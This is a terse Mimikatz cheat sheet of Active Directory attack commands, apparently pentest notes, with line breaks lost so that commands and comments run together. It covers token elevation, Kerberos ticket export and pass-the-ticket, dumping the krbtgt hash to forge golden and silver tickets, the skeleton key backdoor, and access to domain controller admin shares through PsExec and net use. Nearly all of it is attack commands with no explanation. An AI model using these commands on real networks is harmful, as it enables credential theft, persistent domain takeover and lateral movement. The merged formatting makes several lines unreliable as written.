# use when using evil-winrm, we get medium integrity shellstoken::elevate
Pass-the-ticket
# exports all .kirbi to current directorysekurlsa::tickets/export# PTT using admin .kirbi kerberos::pttTICKET# to check if ticket is working> klist
Golden / Silver Ticket
# dump hash and SIDlsadump::lsa/inject/name: [krbtgt |DOMAIN_ADMIN_ACCOUNT|SERVICE_ACCOUNT]# create golden ticket and pass-the-ticketkerberos::golden/user:Administrator/domain:DOMAIN/sid:SID/krbtgt:KRBTGT_NTLM_HASH/id:500/ptt# create silver ticket and pass-the-ticketkerberos::golden/user:<USER>/domain:DOMAINM/sid:SID/krbtgt:SERVICE_NTLM_hash/id:1103/ptt# checkmisc::cmddir \\IP\c$ [/user:USER PASS]PsExec.exe \\IPcmd.exe
kerberos Skeleton Key
misc::skeleton# done, now accessing admin share> net use C:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz> dir \\Desktop-1\c$ /user:Machine1 mimikatz